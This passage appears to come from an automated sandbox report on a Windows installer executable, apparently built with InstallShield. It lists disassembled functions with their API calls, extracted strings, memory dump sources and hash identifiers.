                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$FreeH_prolog3$AllocErrorFormatFromInfoLocalMessageProg
                                                                                                                                                                          • String ID: Unknown error
                                                                                                                                                                          • API String ID: 2182933432-83687255
                                                                                                                                                                          • Opcode ID: 791afce53427cb20c049be309681a67d1a7ecc9e3ba313850fa3516114365786
                                                                                                                                                                          • Instruction ID: 05306d3f0dc00386c1c1ccaec84490a802fa39787ae4a65169fbc967a16dcf43
                                                                                                                                                                          • Opcode Fuzzy Hash: 791afce53427cb20c049be309681a67d1a7ecc9e3ba313850fa3516114365786
                                                                                                                                                                          • Instruction Fuzzy Hash: 3341E070A00214AFDF05EF90C849BAE7B79EF44304F54459AE911AB2D2C7B9EE01CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042E4D7, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042E4E1
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: %s%d$HsG$UpgardeTable$count$key
                                                                                                                                                                          • API String ID: 2608676048-1826575653
                                                                                                                                                                          • Opcode ID: 41bf99186e9ca1ab23f29f7b2ba9fc27d27579c2663b688d464d09bd8102805f
                                                                                                                                                                          • Instruction ID: a146ad54afb82d47e7c2848d3495e174a9159c1fb8ccb69653edaac157cfc513
                                                                                                                                                                          • Opcode Fuzzy Hash: 41bf99186e9ca1ab23f29f7b2ba9fc27d27579c2663b688d464d09bd8102805f
                                                                                                                                                                          • Instruction Fuzzy Hash: 38518331900258EEDB14EBA1CC55BEEB778BF50308F5440AEE105B70D2EBB85B48CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043DBA2, Relevance: 10.6, APIs: 7, Instructions: 122fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043DBA9
                                                                                                                                                                          • CreateFileW.KERNEL32(0000000D,40000000,00000000,00000000,00000002,00000080,00000000,00000058,0043DE15), ref: 0043DC09
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043DC16
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0043DC94
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 0043DCDB
                                                                                                                                                                          • FlushFileBuffers.KERNEL32(00000000), ref: 0043DCED
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0043DCF4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersCloseCreateErrorFlushH_prolog3_HandleLastReadWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 616238222-0
                                                                                                                                                                          • Opcode ID: 356d8cc5cb1c6b5bbb6911515d0b82ad4221770631e4fd99e0e6ace0fcd0c9d8
                                                                                                                                                                          • Instruction ID: 585ed323ddebd3186147cacc8200258d99ae34fe2ae40330d5e2382ea7eabb15
                                                                                                                                                                          • Opcode Fuzzy Hash: 356d8cc5cb1c6b5bbb6911515d0b82ad4221770631e4fd99e0e6ace0fcd0c9d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 95418E70E10248AFEB14DFA4DC48B9EBBB5FF48304F14512AF905AB2D1DB799846CB18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043728B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00437295
                                                                                                                                                                          • _memset.LIBCMT ref: 004372B4
                                                                                                                                                                            • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0043742C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ExecuteShell_memset
                                                                                                                                                                          • String ID: ClickOncePackage$Startup$open
                                                                                                                                                                          • API String ID: 447700153-1966403724
                                                                                                                                                                          • Opcode ID: 166a867035b2f0d98fb31b563a3d6b85ab3fc5a696903fde6426d034676c793e
                                                                                                                                                                          • Instruction ID: 00bad6d7401b0886463fa289844bf76d771b88c6f561a79deecea4fe01b8a211
                                                                                                                                                                          • Opcode Fuzzy Hash: 166a867035b2f0d98fb31b563a3d6b85ab3fc5a696903fde6426d034676c793e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4341A071900168AACB20E660CC45BDE77B8BF51304F1081EEE58AB70C1DE749B88CFD9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042164C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00421656
                                                                                                                                                                            • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
                                                                                                                                                                            • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
                                                                                                                                                                          • _memset.LIBCMT ref: 004216AC
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000), ref: 0042178E
                                                                                                                                                                            • Part of subcall function 004013E0: RegCloseKey.ADVAPI32(00000000,00000000,0043F3BA,000001F0,?,00000000,0000000A,?,?,00000001,ServicePack,?,00000001,?,000001F0,00000000), ref: 004013EA
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnceEx, xrefs: 0042172F
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 004216F8
                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 00421679
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$EnumH_prolog3_HandleModuleValue_memset
                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries$Software\Microsoft\Windows\CurrentVersion\RunOnce$Software\Microsoft\Windows\CurrentVersion\RunOnceEx
                                                                                                                                                                          • API String ID: 2943836032-2087105512
                                                                                                                                                                          • Opcode ID: 5c9e872f7fbef1b7a44bb7fdc4a11a250758c8b47fc4cc289af89f7e00326637
                                                                                                                                                                          • Instruction ID: 7af0678b6373b23addbd9c9fea746be422660ee720224ba66001048b6291ef41
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c9e872f7fbef1b7a44bb7fdc4a11a250758c8b47fc4cc289af89f7e00326637
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E3123F1A002289ADB20DA559DC1BEEB6BCAB58348F9040EEB709B2151E6745F48CF1D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045FD2F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FD78
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FD98
                                                                                                                                                                          • lstrcmpA.KERNEL32(0000000B,NETSCAPE2.0,?,?,?,?,00000000,?,?,0046006A,0046006B), ref: 0045FDAD
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FDC5
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FDEB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$lstrcmp
                                                                                                                                                                          • String ID: NETSCAPE2.0
                                                                                                                                                                          • API String ID: 1993653321-1278374441
                                                                                                                                                                          • Opcode ID: 71f3c7f5955ebbbe6865800370e219d421245660fb8700587bc6d7fd965eb667
                                                                                                                                                                          • Instruction ID: 32c8fe1df6bd92f4ae7f53de35fb128e30bd5f96bb62c24c7875583381a47579
                                                                                                                                                                          • Opcode Fuzzy Hash: 71f3c7f5955ebbbe6865800370e219d421245660fb8700587bc6d7fd965eb667
                                                                                                                                                                          • Instruction Fuzzy Hash: 36319071D00219EFDF21CFA5D841AAEB7F9FF59315F10086EE941A6102D3749648CB96
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004172EE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 93COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004172F8
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00457737: __EH_prolog3_GS.LIBCMT ref: 00457741
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorLast$H_prolog3$FreeString
                                                                                                                                                                          • String ID: .ini$0x%04x$FontSize$HsG$Properties
                                                                                                                                                                          • API String ID: 827811706-668208750
                                                                                                                                                                          • Opcode ID: 8a14e5430e4646c9b7a14fcd2a64fb09da9a8b3b9f9d66380dd93b15fd6e8317
                                                                                                                                                                          • Instruction ID: 01fc65d52f24158b68c173272ef29a0ae57f5ce3c2ab66c70089087955249d7b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a14e5430e4646c9b7a14fcd2a64fb09da9a8b3b9f9d66380dd93b15fd6e8317
                                                                                                                                                                          • Instruction Fuzzy Hash: A731D131904248EADB10E7A4CC06BEDBB74AB14304F54419EF545B71C2EBB80B88CBA6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004589E8, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004589EF
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
                                                                                                                                                                            • Part of subcall function 0040F99A: __EH_prolog3_GS.LIBCMT ref: 0040F9A4
                                                                                                                                                                            • Part of subcall function 00458C92: __EH_prolog3_GS.LIBCMT ref: 00458C99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorH_prolog3Last
                                                                                                                                                                          • String ID: .DLL$.EXE$.OCX$.TLB$HsG
                                                                                                                                                                          • API String ID: 1247511005-2009803391
                                                                                                                                                                          • Opcode ID: a1cbdd08920035b137a9b162ff234bafb4b194f72ee74464b6f1c18764d76c6c
                                                                                                                                                                          • Instruction ID: 1e6655abbd4ccfe61a04ff375f6c5a7ef4005c331331184d2614f1a6e8a8bf97
                                                                                                                                                                          • Opcode Fuzzy Hash: a1cbdd08920035b137a9b162ff234bafb4b194f72ee74464b6f1c18764d76c6c
                                                                                                                                                                          • Instruction Fuzzy Hash: CC3174B0900209BEDB04FF65C8925AE7B68AF14349F50402FFC1566263EF79894ACB9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440CE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 00440D1D
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 00440D27
                                                                                                                                                                            • Part of subcall function 0043FBBE: lstrlenW.KERNEL32(?,74B48250,?,00440D35,?), ref: 0043FBCA
                                                                                                                                                                          • _swscanf.LIBCMT ref: 00440D9C
                                                                                                                                                                            • Part of subcall function 0044502E: _vscan_fn.LIBCMT ref: 00445042
                                                                                                                                                                          • _swscanf.LIBCMT ref: 00440DC5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _swscanflstrcpy$_vscan_fnlstrlen
                                                                                                                                                                          • String ID: %u.%u.%u.%u$CJ
                                                                                                                                                                          • API String ID: 1604777239-2639954372
                                                                                                                                                                          • Opcode ID: 41d9aed87dab70958e70d4741761836200fe8b0acb79f0c2f1a9a6320159d62c
                                                                                                                                                                          • Instruction ID: 6704d938412cdd5bb68d5123881e454f0f69d75877d20ede4da5c58791a323cb
                                                                                                                                                                          • Opcode Fuzzy Hash: 41d9aed87dab70958e70d4741761836200fe8b0acb79f0c2f1a9a6320159d62c
                                                                                                                                                                          • Instruction Fuzzy Hash: FD31CFF2D1112CAADB20DF95DD44ACEB7BCAB48714F4041EBB609E3101D674AB89CF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041832D, Relevance: 10.6, APIs: 7, Instructions: 72windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00418334
                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00418349
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00418366
                                                                                                                                                                          • SetStretchBltMode.GDI32(?,00000004), ref: 0041839D
                                                                                                                                                                          • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004183C5
                                                                                                                                                                          • SetStretchBltMode.GDI32(?,00000000), ref: 004183CF
                                                                                                                                                                          • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 004183E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Stretch$Mode$CompatibleCreateH_prolog3ObjectSelect
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3333437850-0
                                                                                                                                                                          • Opcode ID: ac47494f2d0392b9f7ed79f09c5ae834809778a50cdd03702fdbe21bdfa736ab
                                                                                                                                                                          • Instruction ID: 0a90db99123f0c350c4330a97819a75f34c7ffeb20e4cb14a68f5d94413c97e2
                                                                                                                                                                          • Opcode Fuzzy Hash: ac47494f2d0392b9f7ed79f09c5ae834809778a50cdd03702fdbe21bdfa736ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 25211931500209AFCF11DF90CC85EEE7F72FF04760F158119FA289A2A1CB7299A1DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00436E16, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00436E1D
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 004035C0: SysStringLen.OLEAUT32(?), ref: 004035CE
                                                                                                                                                                            • Part of subcall function 004035C0: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 004035E8
                                                                                                                                                                            • Part of subcall function 0043EB86: __EH_prolog3_GS.LIBCMT ref: 0043EB90
                                                                                                                                                                            • Part of subcall function 0043EB86: _memset.LIBCMT ref: 0043EBC3
                                                                                                                                                                            • Part of subcall function 0043EB86: GetModuleFileNameW.KERNEL32(?,00000104), ref: 0043EBDD
                                                                                                                                                                            • Part of subcall function 0043EB86: _memset.LIBCMT ref: 0043EC0A
                                                                                                                                                                            • Part of subcall function 0043EB86: _memset.LIBCMT ref: 0043EC55
                                                                                                                                                                            • Part of subcall function 0043EB86: GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,?), ref: 0043EC69
                                                                                                                                                                            • Part of subcall function 0043EB86: GetTempFileNameW.KERNEL32(?,0047D474,00000000,?,?,?,?,?,?,?,?,?), ref: 0043EC83
                                                                                                                                                                            • Part of subcall function 00403460: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30), ref: 0040349F
                                                                                                                                                                            • Part of subcall function 00403460: GetLastError.KERNEL32(?,00000000,000000FF), ref: 00403539
                                                                                                                                                                            • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403553
                                                                                                                                                                            • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403560
                                                                                                                                                                            • Part of subcall function 00403460: SetLastError.KERNEL32(?), ref: 00403584
                                                                                                                                                                            • Part of subcall function 00403460: SetLastError.KERNEL32(?,?,00000000,74B04C30), ref: 0040358A
                                                                                                                                                                            • Part of subcall function 00444D99: __wtof_l.LIBCMT ref: 00444DA1
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00436EB1
